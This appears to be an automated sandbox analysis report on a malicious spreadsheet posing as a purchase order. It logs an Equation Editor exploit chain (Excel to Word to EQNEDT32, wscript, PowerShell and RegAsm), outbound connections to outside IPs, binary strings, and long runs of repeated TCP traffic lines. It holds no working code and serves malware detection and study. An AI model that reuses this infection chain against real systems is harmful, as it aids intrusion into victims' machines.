            Source: Yara match, File source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Mac Purchase Order PO102935.xls, Joe Sandbox ML: detected

            Exploits

            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 192.210.150.33 Port: 80
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
            Source: ~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp.3.dr, Stream path '_1785284311/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp.3.dr, Stream path '_1785284315/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknown, HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466622226.0000000001EC0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466090226.0000000001D60000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.0000000002050000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: find.pdb source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000002.620877764.0000000000654000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wfbjvizcWo.exe, 0000000C.00000002.620770237.00000000000FE000.00000002.00000001.01000000.00000008.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479928036.00000000000FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: find.pdbN source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
